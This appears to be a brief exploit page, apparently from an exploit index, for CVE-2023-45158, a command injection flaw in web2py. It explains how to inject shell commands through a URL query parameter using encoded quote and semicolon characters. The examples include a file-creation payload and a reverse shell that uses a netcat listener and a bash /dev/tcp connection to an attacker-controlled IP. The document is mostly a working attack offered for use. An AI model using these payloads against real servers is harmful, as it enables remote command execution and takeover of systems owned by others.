Share
## https://sploitus.com/exploit?id=71EB250C-7A83-5D51-974A-725E1371D1F6
# CVE-2023-45158

# Steps
1. Run the webserver
```bash
cd web2py
python3 web2py.py
```

2. Inject your command using the URL ``http://<IP-ADDRESS>:8000/hack?msg=%27%3B<YOUR-COMMAND>%3B%27``. Replace ``<IP-ADDRESS>`` and ``<YOUR-COMMAND>`` with your values.

# Examples
1. Create a file on the server

``http://<IP-ADDRESS>:8000/hack?msg=%27%3Btouch%20hack%3B%27``

2. Reverse shell

On the attacker's machine, run ``nc -l 127.0.0.1 8080``

Go to URL ``http://<IP-ADDRESS>:8000/hack?msg=%27%3Bbash%20-i%20>%26/dev/tcp/<ATTACKER-IP>/8080%200>%26%201%3B%27``. Replace ``<ATTACKER-IP>``.